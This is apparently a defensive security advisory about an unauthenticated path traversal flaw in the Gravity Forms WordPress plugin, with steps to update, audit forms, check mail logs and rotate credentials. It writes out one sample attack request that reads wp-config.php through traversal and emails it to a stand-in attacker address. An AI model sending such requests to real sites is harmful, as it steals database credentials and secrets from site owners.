A path traversal vulnerability in Gravity Forms versions 2.10.4 and earlier allows any unauthenticated attacker to read arbitrary files from the web server — including wp-config.php, .env files, and /etc/passwd — without a user account of any kind. The stolen file is delivered to an attacker-supplied email address as an attachment, making exfiltration silent and hard to detect without egress email monitoring. Gravity Forms released version 2.10.5 to address this issue. If you run any Gravity Forms installation with file-upload fields, treat this as an urgent update.

What the Vulnerability Is

The vulnerability exists in the Resume Link feature of Gravity Forms — a convenience function that lets form visitors save a partially completed form and receive a link via email to continue later. The endpoint that processes this action (process_send_resume_link) accepts a gform_uploaded_files POST parameter that is intended to reference files the visitor already uploaded to the server during partial form completion.

The flaw: the path inside gform_uploaded_files is not validated against an allowlist of safe upload directories before being read and attached to the outgoing email. An attacker can supply an arbitrary path — using standard directory traversal sequences — and the server will read that file and email it to any address the attacker specifies.

A minimal malicious request looks like:

POST /wp-admin/admin-ajax.php HTTP/1.1
action=gforms_send_resume_link&
gform_uploaded_files={"0":"../../wp-config.php"}&
email=attacker@evil.com&form_id=1

No session cookie, no nonce knowledge beyond the public form ID, and no prior uploaded file: just a POST to the publicly accessible AJAX endpoint. The attack is silent by default — the attacker does not see the response body. The file lands in their inbox.

Why It Matters

  • wp-config.php is the crown jewel of a WordPress site. It contains the database hostname, name, username, and password in plaintext. With those credentials, an attacker can connect to the database directly or chain into a second exploit for full site takeover.
  • Other high-value targets: .env files (Bedrock/Sage sites store API keys, Stripe and Mailchimp credentials), /etc/passwd (enumerate users for brute-force attacks), and any file the web server process (www-data, apache, or nginx) can read.
  • Unauthenticated and requires no user interaction. The CVSS vector AV:N/AC:L/PR:N/UI:N means it is network-exploitable, low complexity, requires no privileges and no victim action. It is trivially scriptable at scale.
  • Silent exfiltration. The stolen data goes out as a normal email from your own mail server. Server-side detection requires either email egress monitoring or WAF inspection of POST body content.
  • Gravity Forms is installed on more than 1 million WordPress sites. Not every site uses file uploads, but the plugin's prevalence makes broad opportunistic scanning worthwhile for attackers.

Am I Affected?

You are affected if all three conditions are true:

  1. Your site runs Gravity Forms version 2.10.4 or earlier.
  2. At least one published form has a File Upload field enabled.
  3. The form is publicly accessible (not behind a login wall or member-only page).

The third condition is the one that surprises people. Even if the file upload field is present, the attack requires the form to be reachable by unauthenticated requests. Forms gated by a membership plugin, is_user_logged_in() checks, or HTTP basic auth on the directory are not directly reachable by this exploit path.

However, if you are unsure whether any public forms have file upload fields, treat the site as affected and patch.

What to Do About It: Step-by-Step

1. Update Gravity Forms to 2.10.5 immediately.

The fix is available through the standard WordPress auto-update system. Update from your dashboard or via WP-CLI:

# Check current Gravity Forms version
wp plugin get gravityforms --field=version

# Update Gravity Forms
wp plugin update gravityforms

# Verify the update
wp plugin get gravityforms --field=version

Confirm the version shown is 2.10.5 or later before continuing.

2. Audit which forms have file uploads exposed.

Log in to Gravity Forms → Forms and review any form containing a File Upload field or Resume / Save and Continue functionality. If any such form is publicly accessible, treat it as a potential exposure target.

3. Check your email logs for anomalous resume-link sends.

The attack triggers the resume-link email flow, which means your mail server sent an email to the attacker. Look for:

  • Outbound emails with a From address matching your form notification sender
  • Subject lines matching Gravity Forms resume-link templates (typically "Continue Your Form Submission")
  • Recipients you do not recognize

If you find suspicious emails, assume file exfiltration occurred and rotate all credentials stored in files the web process can read.

4. Rotate wp-config.php credentials if you suspect exploitation.

# Generate a new, strong database password
openssl rand -base64 32

# Update the password in your database:
wp db query "ALTER USER 'dbuser'@'localhost' IDENTIFIED BY 'new_password_here';"

# Then update wp-config.php with the matching new password

5. Review and tighten Gravity Forms file upload configuration.

After patching, check Gravity Forms Settings → General to ensure uploaded file paths are set to a subdirectory you can monitor, and disable Resume / Save and Continue on forms that do not require it.

Quick-Win Checklist

  • Run wp plugin update gravityforms and confirm version is 2.10.5 or later
  • Check Gravity Forms admin → Forms for any form with a File Upload field that is publicly accessible
  • Search mail server logs for unexpected resume-link emails to unrecognized recipients
  • Rotate wp-config.php database credentials if exploitation is suspected
  • Rotate any API keys stored in .env or config files if exploitation is suspected
  • Disable Resume / Save and Continue on public forms that do not require it
  • Enable WordPress auto-updates for plugins, or add Gravity Forms to your weekly patch review list

Sources